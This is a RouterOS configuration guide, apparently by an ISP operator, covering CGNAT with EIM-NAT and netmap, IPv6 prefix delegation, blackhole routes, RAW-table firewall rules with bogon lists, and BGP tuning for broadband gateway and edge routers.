Figure-8 (NAT Traversal Helpers on RouterOS)
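For reference, the CLI equivalent of what Figure-8 shows would be along these lines (a sketch assuming the stock helper list on current RouterOS; verify the exact set of service ports available on your version):
#Enable the NAT traversal helpers (service ports) on the NAT box#
/ip firewall service-port
set ftp disabled=no
set tftp disabled=no
set irc disabled=no
set h323 disabled=no
set sip disabled=no sip-direct-media=yes
set pptp disabled=no
set udplite disabled=no
set dccp disabled=no
set sctp disabled=no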
• Use the following config template going forward (2024 onwards), which includes IPsec passthrough, EIM-NAT and netmap functionality for 1:many NAT with consistent 1:1 port mapping. Please note that rule order is important; the following template has accounted for rule order so packets are captured correctly. We will assume “103.176.189.0/30” to be our public CGNAT pool.
/ip firewall nat
#EIM-NAT#
add action=endpoint-independent-nat chain=srcnat comment=EIM-NAT out-interface-list=WAN protocol=udp randomise-ports=no src-address=100.64.0.0/10 src-port=1024-65535 to-addresses=103.176.189.0/30
add action=endpoint-independent-nat chain=dstnat comment=EIM-NAT dst-address=103.176.189.0/30 dst-port=1024-65535 in-interface-list=WAN protocol=udp randomise-ports=no to-addresses=100.64.0.0/10
#Required as EIM-NAT in MikroTik doesn't support all layer 4 Protocols#
add action=netmap chain=srcnat comment="CGNAT Rule" dst-address-list=!not_in_internet ipsec-policy=out,none out-interface-list=WAN src-address-list=cgnat_subnet to-addresses=103.176.189.0/30
#Hairpinning rule to ensure P2P traffic works for all clients behind the CGNAT#
add action=masquerade chain=srcnat comment="Hairpin for CGNAT clients" dst-address-list=cgnat_subnet src-address-list=cgnat_subnet
• Here cgnat_subnet=address list containing CGNAT subnets i.e. 100.64.0.0/10
• dst-address-list=!not_in_internet is self-explanatory, anything destined towards private subnets shouldn’t be NATted towards WAN
• The hairpinning will allow customers to talk to each other using their CGNAT IP, Xbox makes use of this and is mentioned in RFC 7021.
• Avoid Deterministic NAT, the above configuration allows P2P traffic initiated from the inside to be reachable from the outside with various applications that make use of ephemeral ports/UDP NAT punching/STUN etc
• We were able to successfully seed the official Ubuntu Torrent behind the CGNAT with the above configuration, which can mean only one thing: P2P networking from in-bound established works!
Figure-9 (BitTorrent Seeding Behind CGNAT)
• We tried with src nat as action for src NAT chain but it resulted in the NATted public IP constantly changing on the customer side and breaking things
Below is what MikroTik support had to say about netmap vs src nat as action for src nat chain
Figure-10 (Src nat = breaks P2P traffic | Netmap = static mapping per client IP)
• Now we fix routing loops for the CGNAT public pool
/ip route
add blackhole comment="Blackhole-CGNAT pool" dst-address=103.176.189.0/30
Subscription Ratio Recommendation
In my extensive testing and observations, when using the above parameters and steps, I was able to put 200 users behind a /30 without any known complaints from them. BitTorrent worked as expected too, likely because not all 200 users will max out 65k connections and use up every IP:port combination. Where will you find a CPE that can handle 65k NAT entries anyway?
So, tl;dr: you can use a /30 per 200 users as long as you follow the steps properly; also, to be future-proof and safe, ensure you provide IPv6 as well.
End Result
Figure-11 (Your NAT Table should look as dead simple as this one)
Logging compliance for government and regulatory requirements
For CGNAT logging for compliance purposes, you can use Traffic Flow, which also adds an additional option for NAT event logging in the configuration.
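As a minimal sketch, assuming a hypothetical collector at 192.0.2.10:2055 (replace with your own NetFlow/IPFIX collector), the Traffic Flow export itself looks like this; the NAT-events option mentioned above lives in the same Traffic Flow settings, with the exact parameter name depending on your RouterOS version:
#Hypothetical Traffic Flow export towards a flow collector for CGNAT/NAT logging#
/ip traffic-flow
set enabled=yes interfaces=all
/ip traffic-flow target
add dst-address=192.0.2.10 port=2055 version=9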
IPv6
Issues
• Addressing may not be optimally subnetted/broken down
• An ISP may only have something like a single /48 with 5000 customers downstream, which exceeds the 256 possible /56s in a /48
• Not following the proper guidelines for IPv6 deployment
• Lack of persistent assignment feature on MikroTik
• This applies to the majority of ISPs even though they may use Cisco, Juniper etc which supports persistent assignment configuration
• Not properly ensuring that the customer’s WAN side gets a proper single /64
• Forcing the customer to have only a single /64 on the LAN side instead of /56
• MikroTik IPv6 RADIUS does not work correctly
Solutions
• A proper IPv6 architecture and subnetting plan should be implemented
• However, the logic is simple
Ensure customers get /64 WAN side and /56 LAN side for home users
Ensure customers get /64 WAN side and /48 LAN side for enterprise/SMEs/DC etc
• Ensure you request for appropriate prefix allocation based on your customer base from your Regional Internet registry/Local Internet registry
• Follow the proper guidelines and BCOPs
• I came across a solution for the lack of persistent assignment on MikroTik, simply use the following script and schedule it to run every five minutes:
#Please don't be stupid enough to set owner=Daryll#
/system script
add dont-require-permissions=no name=PPPoE-IPv6-Persistent owner=Daryll policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source=\
"/ipv6 dhcp-server binding;\r\
\n:foreach i in=[find server~\"pppoe\"] do={\r\
\n make-static \$i;\r\
\n set \$i comment=[get \$i server];\r\
\n set \$i server=all;\r\
\n}"
Use the scheduler for automating it:
/system scheduler
add interval=5m name=PPPoE-IPv6-Persistent-AutoUpdate on-event=PPPoE-IPv6-Persistent policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon start-time=startup
Now I will cover a simple configuration use-case where a BNG has exactly 1000 customers. The goal here is to ensure that the WAN side of each customer gets a /64 and the LAN side gets a /56.
• Disable redirects
/ipv6 settings set accept-redirects=no
• Next, we need to create two separate pools, one for the WAN and one for the LAN side of the customer
/ipv6 pool
add name=Customer-CPE-LAN prefix=2405:a140:8::/46 prefix-length=56
add name=Customer-CPE-WAN prefix=2405:a140:f:d400::/54 prefix-length=64
• Here, prefix-length specifies what prefix length the customer gets, which in this case as per standards, we are giving the WAN side a /64 and the LAN side a /56
• And finally, configure the pools to each PPPoE Profile as below
/ppp profile
set *0 dhcpv6-pd-pool=Customer-CPE-LAN remote-ipv6-prefix-pool=Customer-CPE-WAN
add name=profile2 dhcpv6-pd-pool=Customer-CPE-LAN remote-ipv6-prefix-pool=Customer-CPE-WAN
• Remote IPv6 prefix is for the WAN side of the customer
• DHCPv6 PD Pool is for the LAN side of the customer
Figure-12 (PPPoE IPv6 configuration)
That’s it, now the customers will dynamically get a routed /64 and routed /56 for WAN and LAN sides respectively.
Verify IPv6 config
If you have properly configured IPv6 as per the steps above, then you should see the following results when testing from customer-side using this tool:
Figure-13 (IPv6 working correctly)
Routing Loop prevention
If a customer happens to go offline (due to power loss etc.), traffic destined for that customer will keep arriving until the flows time out, leading to increased CPU usage. To solve this, we simply route the aggregated customer prefixes to blackhole. Remember that in routing, more specific prefixes always win: while customers are online their more specific routes take precedence, and when they go offline the less specific (aggregated) blackhole routes take over, so all pending traffic times out with immediate effect and CPU usage stays optimal.
#RouterOS v7 example#
/ip route
add blackhole comment="Blackhole route for Customer CGNAT pool" disabled=no dst-address=103.176.189.0/25
add blackhole comment="Blackhole route for Customer public pool" disabled=no dst-address=103.176.189.128/25
/ipv6 route
add blackhole comment="Blackhole route for Customer LAN pool" disabled=no dst-address=2405:a140:8::/46
add blackhole comment="Blackhole route for Customer WAN pool" disabled=no dst-address=2405:a140:f:d400::/54
#RouterOS v6 example#
/ip route
add type=blackhole comment="Blackhole route for Customer CGNAT pool" disabled=no dst-address=103.176.189.0/25
add type=blackhole comment="Blackhole route for Customer public pool" disabled=no dst-address=103.176.189.128/25
#In RouterOS v6, IPv6 blackhole is not supported#
Firewall/Security
Issues
• Blocks inbound ports based on the false logic of “protecting” the customer
• Port blocking does nothing to improve security; it only breaks legitimate traffic such as apps or games that use various methods for VoIP
• Malware can make use of port 443 and that is the reality of modern-day malware anyway
• Net Neutrality Violations
• Such as blocking TCP/UDP traffic destined towards Cloudflare or Google Anycast DNS
• Lacks basic DDoS protection
• Lacks simple bogon filtering
• Lacks basic rules such as dropping invalid traffic on the input chain
• Lacks FastTracking for traffic destined towards your NATted pools
• Connection tracking of customers having a public IPv4 address makes no sense and wastes CPU cycles
• Incorrect ICMPv4/ICMPv6 filtering rules, such as rate limiting “fragmentation needed”, and then wondering why customers face strange PMTUD issues
Solutions
• Remove most “port blocking” rules
• Customer Site security should be handled on the customer site such as having proper basic firewalling on their Edge Routers
• I’ve dropped some ports on the RAW table directly
• Avoid Net Neutrality Violation unless otherwise enforced by your local state or central government
• I’ve shared the rule for FastTracking NATted pools
• I’ve shared the rule for reducing connection tracking impact on customers having public IPv4 address
• I have crafted the ICMPv4/ICMPv6 chains manually to drop all deprecated ICMP types while accepting all valid ICMP types
Below are the generic firewall rules that should be deployed on the BNG to cover basic security grounds.
IPv4 Firewall
#First we take care of address lists#
/ip firewall address-list
#Enter all local subnets/public subnets applicable to your AS for the specific BNG where you've routed pools for use#
#Example I'm using only a /24 public+private pools for this specific BNG#
add address=103.176.189.0/24 comment="Public Pool" list=lan_subnets
add address=192.168.0.0/24 comment="Local interfaces" list=lan_subnets
#The usual CGNAT pool entire range#
add address=100.64.0.0/10 comment="CGNAT Pool" list=lan_subnets
#Here we will enter the public pool used for giving customers public IP addresses directly, this will be used for no-tracking to boost performance of customers having public IPv4 addresses and reduce load on the CPU of the BNG#
add address=103.176.189.0/25 comment="Public Pool" list=public_subnets
###Required for DDoS protection rules###
add list=ddos-attackers
add list=ddos-targets
###Bogon filtering addresses for each of the rules in RAW/Filter###
add address=0.0.0.0/8 comment=RFC6890 list=not_in_internet
add address=172.16.0.0/12 comment=RFC6890 list=not_in_internet
add address=192.168.0.0/16 comment=RFC6890 list=not_in_internet
add address=10.0.0.0/8 comment=RFC6890 list=not_in_internet
add address=169.254.0.0/16 comment=RFC6890 list=not_in_internet
add address=127.0.0.0/8 comment=RFC6890 list=not_in_internet
add address=224.0.0.0/4 comment=Multicast list=not_in_internet
add address=198.18.0.0/15 comment=RFC6890 list=not_in_internet
add address=192.0.0.0/24 comment=RFC6890 list=not_in_internet
add address=192.0.2.0/24 comment=RFC6890 list=not_in_internet
add address=198.51.100.0/24 comment=RFC6890 list=not_in_internet
add address=203.0.113.0/24 comment=RFC6890 list=not_in_internet
add address=100.64.0.0/10 comment=RFC6890 list=not_in_internet
add address=240.0.0.0/4 comment=RFC6890 list=not_in_internet
add address=192.88.99.0/24 comment="6to4 relay Anycast [RFC 3068]" list=not_in_internet
add address=255.255.255.255 comment=RFC6890 list=not_in_internet
add address=127.0.0.0/8 comment="RAW Filtering - RFC6890" list=bad_ipv4
add address=192.0.0.0/24 comment="RAW Filtering - RFC6890" list=bad_ipv4
add address=192.0.2.0/24 comment="RAW Filtering - RFC6890 documentation" list=bad_ipv4
add address=198.51.100.0/24 comment="RAW Filtering - RFC6890 documentation" list=bad_ipv4
add address=203.0.113.0/24 comment="RAW Filtering - RFC6890 documentation" list=bad_ipv4
add address=240.0.0.0/4 comment="RAW Filtering - RFC6890 reserved" list=bad_ipv4
add address=224.0.0.0/4 comment="RAW Filtering - multicast" list=bad_src_ipv4
add address=255.255.255.255 comment="RAW Filtering - RFC6890" list=bad_src_ipv4
add address=0.0.0.0/8 comment="RAW Filtering - RFC6890" list=bad_dst_ipv4
add address=224.0.0.0/4 comment="RAW Filtering - multicast" list=bad_dst_ipv4 disabled=yes
/ip firewall raw
add action=drop chain=prerouting comment="Drop DDoS src and dst address list" dst-address-list=ddos-targets src-address-list=ddos-attackers
add action=drop chain=prerouting comment="drop port 25 to prevent spam" port=25 protocol=tcp
add action=drop chain=prerouting comment="drop port 25 to prevent spam" port=25 protocol=udp
#Required at least in India to reduce call spam/scam#
add action=drop chain=prerouting comment="Drop outgoing SIP to block call centre scammers" port=5060,5061 protocol=tcp
add action=drop chain=prerouting comment="Drop outgoing SIP to block call centre scammers" port=5060,5061 protocol=udp
add action=accept chain=prerouting comment="Enable this rule for transparent mode" disabled=yes
#If you are using DHCP, change this to accept#
add action=drop chain=prerouting comment="defconf: Drop DHCP discover" dst-address=255.255.255.255 dst-port=67 in-interface-list=LAN protocol=udp src-address=0.0.0.0 src-port=68
add action=drop chain=prerouting comment="defconf: drop bad src IPs" src-address-list=bad_ipv4
add action=drop chain=prerouting comment="defconf: drop bad dst IPs" dst-address-list=bad_ipv4
add action=drop chain=prerouting comment="defconf: drop bad src IPs" src-address-list=bad_src_ipv4
add action=drop chain=prerouting comment="defconf: drop bad dst IPs" dst-address-list=bad_dst_ipv4
add action=drop chain=prerouting comment="defconf: drop non global from WAN" in-interface-list=WAN src-address-list=not_in_internet
add action=drop chain=prerouting comment="defconf: drop forward to private ranges from WAN" dst-address-list=not_in_internet in-interface-list=WAN
#Remember to properly enter all subnets in the lan_subnet list for both your AS public IPv4 blocks and CGNAT/local subnets#
add action=drop chain=prerouting comment="defconf: drop local if not from default IP range" in-interface-list=LAN src-address-list=!lan_subnets
add action=drop chain=prerouting comment="defconf: drop bad UDP" port=0 protocol=udp
add action=jump chain=prerouting comment="defconf: jump to TCP chain" jump-target=bad_tcp protocol=tcp
add action=jump chain=prerouting comment="defconf: jump to ICMP chain" jump-target=icmp protocol=icmp
#Rule for reducing connection tracking impact for public IPv4 customers, we no longer exclude RFC6890-bound packets as the route-to-blackhole rules take care of that#
add action=notrack chain=prerouting comment="Reduce load on conn_track" in-interface-list=LAN src-address-list=public_subnets
add action=accept chain=prerouting comment="defconf: accept everything else from LAN" in-interface-list=LAN
add action=accept chain=prerouting comment="defconf: accept everything else from WAN" in-interface-list=WAN
add action=accept chain=prerouting comment="Accept local traffic to self" src-address-type=local
add action=drop chain=prerouting comment="defconf: drop the rest"
add action=drop chain=bad_tcp comment="defconf: TCP port 0 drop" port=0 protocol=tcp
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=!fin,!syn,!rst,!ack
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=fin,syn
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=fin,rst
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=fin,!ack
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=fin,urg
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=syn,rst
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=rst,urg
add action=drop chain=icmp comment="Drop Source Quench (Deprecated)" icmp-options=4 protocol=icmp
add action=drop chain=icmp comment="Drop Alternate Host Address (Deprecated)" icmp-options=6 protocol=icmp
add action=drop chain=icmp comment="Drop Information Request (Deprecated)" icmp-options=15 protocol=icmp
add action=drop chain=icmp comment="Drop Information Reply (Deprecated)" icmp-options=16 protocol=icmp
add action=drop chain=icmp comment="Drop Address Mask Request (Deprecated)" icmp-options=17 protocol=icmp
add action=drop chain=icmp comment="Drop Address Mask Reply (Deprecated)" icmp-options=18 protocol=icmp
add action=drop chain=icmp comment="Drop Traceroute (Deprecated)" icmp-options=30 protocol=icmp
add action=drop chain=icmp comment="Drop Datagram Conversion Error (Deprecated)" icmp-options=31 protocol=icmp
add action=drop chain=icmp comment="Drop Mobile Host Redirect (Deprecated)" icmp-options=32 protocol=icmp
add action=drop chain=icmp comment="Drop IPv6 Where-Are-You (Deprecated)" icmp-options=33 protocol=icmp
add action=drop chain=icmp comment="Drop IPv6 I-Am-Here (Deprecated)" icmp-options=34 protocol=icmp
add action=drop chain=icmp comment="Drop Mobile Registration Request (Deprecated)" icmp-options=35 protocol=icmp
add action=drop chain=icmp comment="Drop Mobile Registration Reply (Deprecated)" icmp-options=36 protocol=icmp
add action=drop chain=icmp comment="Drop Domain Name Request (Deprecated)" icmp-options=37 protocol=icmp
add action=drop chain=icmp comment="Drop Domain Name Reply (Deprecated)" icmp-options=38 protocol=icmp
add action=drop chain=icmp comment="Drop SKIP (Deprecated)" icmp-options=39 protocol=icmp
/ip firewall filter
add action=accept chain=input comment="defconf: accept established,related,untracked" connection-state=established,related,untracked
add action=drop chain=input comment="defconf: drop invalid" connection-state=invalid
add action=accept chain=input comment="defconf: accept ICMP after RAW" protocol=icmp
add action=accept chain=input comment="defconf: accept UDP traceroute" port=33434-33534 protocol=udp
#Example to allow access to router's ports from all interfaces LAN/WAN#
add action=accept chain=input comment="Accept Winbox TCP" dst-port=65000 protocol=tcp
add action=accept chain=input comment="Accept API TCP" dst-port=8728 protocol=tcp
add action=accept chain=input comment="Accept API UDP" dst-port=8728 protocol=udp
add action=accept chain=input comment="Accept SNMP for internal use" dst-port=161 protocol=udp
add action=accept chain=input comment="Accept RADIUS UDP" dst-port=1700,1812,1813 protocol=udp
add action=accept chain=input comment="Accept RADIUS TCP" dst-port=1700,1812,1813 protocol=tcp
#End of example#
add action=drop chain=input comment="defconf: drop all not coming from LAN's interface list/subnets" in-interface-list=!LAN
#PPPoE clients are excluded so as not to bypass queues; if using DHCP, exclude the src and dst address lists of the customer pool#
add action=fasttrack-connection chain=forward comment="Rule for NAT Acceleration behaviour (will reduce CPU usage for NATted traffic)" in-interface=!all-ppp out-interface=!all-ppp
add action=accept chain=forward comment="allow already established connections" connection-state=established,related,untracked
add action=jump chain=forward comment="Jump to DDoS detection" connection-state=new in-interface-list=WAN jump-target=detect-ddos
add action=return chain=detect-ddos dst-limit=50,50,src-and-dst-addresses/10s
add action=add-dst-to-address-list address-list=ddos-targets address-list-timeout=10m chain=detect-ddos
add action=add-src-to-address-list address-list=ddos-attackers address-list-timeout=10m chain=detect-ddos
#This rule should be redundant as we are now routing RFC6890 to blackhole directly, hence I am commenting it out#
#add action=drop chain=forward comment="Drop tries to reach not public addresses from LAN" dst-address-list=not_in_internet in-interface-list=LAN out-interface-list=WAN#
IPv6 Firewall
I have now added a rule in the raw table to drop extension headers 0 and 43 as per this. The linked article also suggests dropping header 60, but I decided not to drop header 60 for the reasons stated in the re-tweet here. Please note this only works on RouterOS v7.4 onwards, as a bug affecting it was fixed in that version.
I have now also removed the forward rules completely, moving their function to the raw table to improve performance.
/ipv6 firewall address-list
#Enter all the public prefixes that you've routed to this particular BNG#
#We will use this to block spoofed IPv6 coming from customers#
#We will also use this for no-tracking to boost the performance of customers behind public IPv6 addresses and reduce load on the CPU of the BNG#
#example#
add address=2405:a140:8::/46 comment="CPE-LAN-Pool" list=lan_subnets
add address=2405:a140:c::/54 comment="CPE-WAN-Pool" list=lan_subnets
#Example of any IPv6 you're using on the BNG towards downstream switches/devices/VMs etc#
add address=2405:a140:e::/48 comment="Backbone-Pool" list=lan_subnets
#To prevent breaking link-local#
add address=fe80::/10 comment="Link-local" list=lan_subnets
#Add your BGP peers here, example below#
add address=2400:7000:1::/126 comment="Peering with Transit on VLAN100" list=bgp_peers
#Copy Paste all the following#
add address=::/3 comment="IPv6 invalids" list=not_in_internet
add address=4000::/3 comment="IPv6 invalids" list=not_in_internet
add address=6000::/3 comment="IPv6 invalids" list=not_in_internet
add address=8000::/3 comment="IPv6 invalids" list=not_in_internet
add address=a000::/3 comment="IPv6 invalids" list=not_in_internet
add address=c000::/3 comment="IPv6 invalids" list=not_in_internet
add address=e000::/4 comment="IPv6 invalids" list=not_in_internet
add address=f000::/5 comment="IPv6 invalids" list=not_in_internet
add address=f800::/6 comment="IPv6 invalids" list=not_in_internet
add address=fc00::/7 comment="IPv6 invalids" list=not_in_internet
add address=fe00::/9 comment="IPv6 invalids" list=not_in_internet
add address=fec0::/10 comment="IPv6 invalids" list=not_in_internet
add address=2001::/23 comment="IPv6 invalids" list=not_in_internet
add address=2001:2::/48 comment="IPv6 invalids" list=not_in_internet
add address=2001:10::/28 comment="IPv6 invalids" list=not_in_internet
add address=2001:db8::/32 comment="IPv6 invalids" list=not_in_internet
add address=2002::/16 comment="IPv6 invalids" list=not_in_internet
add address=3ffe::/16 comment="IPv6 invalids" list=not_in_internet
#We will use this to eliminate the need for stateful firewalling on IPv6 to catch spoofed traffic in the raw table instead of forward chain#
add address=2000::/3 list="global_unicast_prefix(es)"
add address=fe80::/10 list=allowed
add address=ff02::/16 comment="multicast" list=allowed
add address=fe80::/10 comment="defconf: RFC6890 Linked-Scoped Unicast" list=no_forward_ipv6
add address=ff00::/8 comment="defconf: multicast" list=no_forward_ipv6
add address=::1/128 comment="defconf: lo" list=bad_ipv6
add address=::ffff:0:0/96 comment="defconf: ipv4-mapped" list=bad_ipv6
add address=::/96 comment="defconf: ipv4 compat" list=bad_ipv6
add address=2001:db8::/32 comment="defconf: documentation" list=bad_ipv6
add address=2001:10::/28 comment="defconf: ORCHID" list=bad_ipv6
add address=2001::/23 comment="defconf: RFC6890" list=bad_ipv6
add address=::/128 comment="defconf: unspecified" list=bad_dst_ipv6
add address=::/128 comment="RAW Filtering" list=bad_src_ipv6
add address=ff00::/8 comment="RAW Filtering" list=bad_src_ipv6
/ipv6 firewall raw
#New rule to drop deprecated extension header types 0 & 43#
#Works only on ROS v7.4 onwards#
add action=drop chain=prerouting comment="Drop packets with extension header types 0, 43" headers=hop,route:contains
add action=accept chain=prerouting comment="defconf: RFC4291, section 2.7.1" dst-address=ff02::1:ff00:0/104 icmp-options=135:0-255 protocol=icmpv6 src-address=::/128
#Migrated this rule from the forward chain to make it more CPU efficient#
add action=drop chain=prerouting comment="defconf: rfc4890 drop hop-limit=1" hop-limit=equal:1 in-interface-list=!LAN protocol=icmpv6
add action=drop chain=prerouting comment="drop port 25 to prevent spam" port=25 protocol=tcp
add action=drop chain=prerouting comment="drop port 25 to prevent spam" port=25 protocol=udp
#This is required for traffic whereby the SRC may be link-local and the DST is GUA, for BGP peers particularly in IXPs#
add action=accept chain=prerouting comment="Accept all ICMPv6 traffic from BGP peers (Required for LL<>GUA packets)" icmp-options=!154:4-5 in-interface-list=WAN protocol=icmpv6 src-address-list=bgp_peers
add action=drop chain=prerouting comment="Drop invalids from WAN" dst-address-list="global_unicast_prefix(es)" in-interface-list=WAN src-address-list=not_in_internet
add action=drop chain=prerouting comment="Drop forwarded invalids from WAN" dst-address-list=not_in_internet in-interface-list=WAN src-address-list="global_unicast_prefix(es)"
add action=drop chain=prerouting comment="Drop invalids from LAN" dst-address-list="global_unicast_prefix(es)" in-interface-list=LAN src-address-list=not_in_internet
add action=drop chain=prerouting comment="Drop forwarded invalids from LAN" dst-address-list=not_in_internet in-interface-list=LAN src-address-list=lan_subnets
#This rule replaces the need for forward chain rule for doing the same thing#
add action=drop chain=prerouting comment="Drop spoofed traffic from LAN going towards Global Unicast" dst-address-list="global_unicast_prefix(es)" in-interface-list=LAN src-address-list=!lan_subnets
add action=accept chain=prerouting comment="defconf: enable for transparent firewall" disabled=yes
add action=drop chain=prerouting comment="defconf: drop bogon IP's" src-address-list=bad_ipv6
add action=drop chain=prerouting comment="defconf: drop bogon IP's" dst-address-list=bad_ipv6
add action=drop chain=prerouting comment="defconf: drop packets with bad src ipv6" src-address-list=bad_src_ipv6
add action=drop chain=prerouting comment="defconf: drop packets with bad dst ipv6" dst-address-list=bad_dst_ipv6
add action=accept chain=prerouting comment="defconf: accept local multicast scope" dst-address=ff02::/16
add action=drop chain=prerouting comment="defconf: drop other multicast destinations" dst-address=ff00::/8
add action=drop chain=prerouting comment="defconf: drop bad UDP" port=0 protocol=udp
add action=drop chain=prerouting comment="defconf: drop bad TCP" port=0 protocol=tcp
add action=jump chain=prerouting comment="defconf: jump to ICMP chain" jump-target=icmpv6 protocol=icmpv6
#Since all filtering for LAN is done in RAW, we do not need to have stateful tracking for LAN, and hence we are notracking all LAN originating/bound traffic after filtering#
add action=notrack chain=output comment="Reduce load on conn_track" in-interface-list=LAN
add action=notrack chain=output comment="Reduce load on conn_track" out-interface-list=LAN
add action=notrack chain=prerouting comment="Reduce load on conn_track" in-interface-list=LAN
add action=notrack chain=prerouting comment="Reduce load on conn_track" dst-address-list=lan_subnets in-interface-list=WAN
add action=accept chain=prerouting comment="defconf: accept everything else from LAN" in-interface-list=LAN
add action=accept chain=prerouting comment="defconf: accept everything else from WAN" in-interface-list=WAN
add action=accept chain=prerouting comment="Accept local traffic to self" src-address-type=local
add action=drop chain=prerouting comment="defconf: drop the rest"
add action=drop chain=icmpv6 comment="Drop FMIPv6 HI + FMIPv6 HAck - Deprecated (RFC5568)" icmp-options=154:4-5 protocol=icmpv6
/ipv6 firewall filter
add action=accept chain=input comment="defconf: accept established,related,untracked" connection-state=established,related,untracked
add action=drop chain=input comment="defconf: drop invalid" connection-state=invalid
add action=accept chain=input comment="defconf: accept ICMPv6" protocol=icmpv6
add action=accept chain=input comment="defconf: accept UDP traceroute" port=33434-33534 protocol=udp
add action=accept chain=input comment="defconf: accept DHCPv6-Client prefix delegation." dst-port=546 protocol=udp src-address=fe80::/10
#Example to allow access to router's ports from all interfaces LAN/WAN#
add action=accept chain=input comment="Accept Winbox TCP" dst-port=65000 protocol=tcp
add action=accept chain=input comment="Accept API TCP" dst-port=8728 protocol=tcp
add action=accept chain=input comment="Accept API UDP" dst-port=8728 protocol=udp
add action=accept chain=input comment="Accept SNMP for internal use" dst-port=161 protocol=udp
add action=accept chain=input comment="Accept RADIUS UDP" dst-port=1700,1812,1813 protocol=udp
add action=accept chain=input comment="Accept RADIUS TCP" dst-port=1700,1812,1813 protocol=tcp
#End of example#
add action=accept chain=input comment="allow allowed addresses" src-address-list=allowed
add action=drop chain=input comment="defconf: drop everything else not coming from LAN" in-interface-list=!LAN
#All forward rules have been migrated to the RAW table for BNGs, for better performance and no stateful tracking required for customers#
For Edge Router
The purpose of the Edge router is to route as fast as possible. So, with that in mind, along with the basic general changes I’ve mentioned at the beginning of this article, the following should also be kept in mind:
1. No NAT
2. No connection tracking aka stateful firewalling (filter table on the firewall section)
• If you enable stateful firewalling on the edge, the router will die in case of DDoS attacks or even just heavy traffic in general
3. No fancy “features” (like Hotspot, PPPoE)
• Use your BNG routers for any customer delegation that is required
BGP Optimisation
This is a work-in-progress section, and at this point in time I am writing based on my experience with Indian ISPs; if you are in the EU/US or other locations, you are probably already implementing the following:
Please note on RouterOS v7, you need to properly configure BGP affinity to avoid CPU issues.
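As a hedged example only (the connection name Transit-A is a placeholder, and the right affinity mode depends on your core count and number of sessions), pinning a session's input and output to their own processes could look like this:
#Hypothetical per-connection BGP affinity tuning on RouterOS v7#
/routing bgp connection
set [find name="Transit-A"] input.affinity=alone output.affinity=alone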
BGP Timers
Based on the Huawei documentation here and here, I personally tested the following configuration and observed that BGP negotiation time and stability (during occasional link flaps/packet loss) improved significantly, so I would recommend network operators set the same timers globally on their networks (for both eBGP and iBGP): keepalive time 20s, hold time 60s.
• /routing bgp template
set default as=149794 disabled=no hold-time=1m keepalive-time=20s
Preferably convince your peers to do the same config on their end as well at least for the individual BGP sessions that are between you and them.
Traffic Engineering and loop prevention
• Always route your aggregated prefixes [say you have a /24 or /22 (IPv4), or a /32 or /36 (IPv6)] to blackhole for both IPv4 and IPv6 to prevent layer 3 loops, and stop disabling synchronisation on RouterOS v6; on RouterOS v7 it is in any case mandatory to either route the prefix to blackhole or have it assigned to an interface
• This will also reduce CPU usage whenever downstream routers/users/switches go offline and incomplete traffic from remote hosts/networks keeps trying to establish a connection and since it gets routed to blackhole it will immediately timeout and save resources.
• In other words, there’s no sense in doing things that increase CPU usage (not routing to blackhole)
• And there is no sense in avoiding loop prevention mechanisms
• Example config on my own network (AS149794) on RouterOS v7
/ip route
add blackhole comment="Blackhole route" disabled=no dst-address=103.176.189.0/24
/ipv6 route
add blackhole comment="Blackhole Route" disabled=no dst-address=2400:7060::/32
add blackhole comment="Blackhole Route" disabled=no dst-address=2400:7060::/48
• If you have multi-homing transit
• Always at the very least, request for partial routing table from all the upstream providers you’re connected to. If the router can handle full tables from the upstreams, go for it!
• This will ensure your router has the best paths to choose from
• Stop going with the strange concept of taking only default routes from the upstreams and creating asymmetric routing conditions where outgoing traffic is going via Transit A and incoming traffic is coming in via Transit B.
• Always advertise all your IP pools to all transit providers to help minimise asymmetric routing which in turn leads to high latency and possibly packet loss in rare cases
• If you need traffic engineering, you can consider BGP-based load balancing or local preferences with some automation like Pathvector (a hedged local-preference filter sketch follows after this list)
• If you have a single homing setup
• Still request for partial table/full table whichever fits your router’s specs in order to futureproof in case you plan to go multi-home
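Referring back to the local-preference suggestion in the list above, a hedged sketch (the chain and connection names are placeholders) of preferring routes learned from one transit could look like this:
#Hypothetical import filter raising local-preference for routes learned from a preferred transit#
/routing filter rule
add chain=TRANSIT-A-IN rule="set bgp-local-pref 200; accept"
/routing bgp connection
set [find name="Transit-A"] input.filter=TRANSIT-A-IN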
Filtering & Security
We only need to do broadly two things for filtering and security:
1. Implement MANRS throughout your network (and business)
2. Use the RAW table to drop remaining bogon/rubbish traffic similar to the one used on the BNG and you can also use it for ACL if you need that
• CPU usage stays minimal when using the RAW table
• Absolutely nothing on the filter table i.e. no stateful firewalling
• The only exception here is we can use FastTrack for untracked traffic i.e. stateless traffic to improve IPv4 routing performance
IPv4 Firewall
#Disable conn_track for using FastTrack statelessly#
/ip firewall connection tracking
set enabled=no
/ip firewall address-list
#Enter all local subnets/public subnets applicable to your AS, use the full CIDR notation of the public IPv4 block assigned to you to avoid missing anything out, please avoid something like /30#
add address=103.176.189.0/24 comment="LAN subnets" list=lan_subnets
add address=192.168.0.0/24 comment="LAN subnets" list=lan_subnets
add address=0.0.0.0/8 comment=RFC6890 list=not_in_internet
add address=172.16.0.0/12 comment=RFC6890 list=not_in_internet
add address=192.168.0.0/16 comment=RFC6890 list=not_in_internet
add address=10.0.0.0/8 comment=RFC6890 list=not_in_internet
add address=169.254.0.0/16 comment=RFC6890 list=not_in_internet
add address=127.0.0.0/8 comment=RFC6890 list=not_in_internet
add address=224.0.0.0/4 comment=Multicast list=not_in_internet
add address=198.18.0.0/15 comment=RFC6890 list=not_in_internet
add address=192.0.0.0/24 comment=RFC6890 list=not_in_internet
add address=192.0.2.0/24 comment=RFC6890 list=not_in_internet
add address=198.51.100.0/24 comment=RFC6890 list=not_in_internet
add address=203.0.113.0/24 comment=RFC6890 list=not_in_internet
add address=100.64.0.0/10 comment=RFC6890 list=not_in_internet
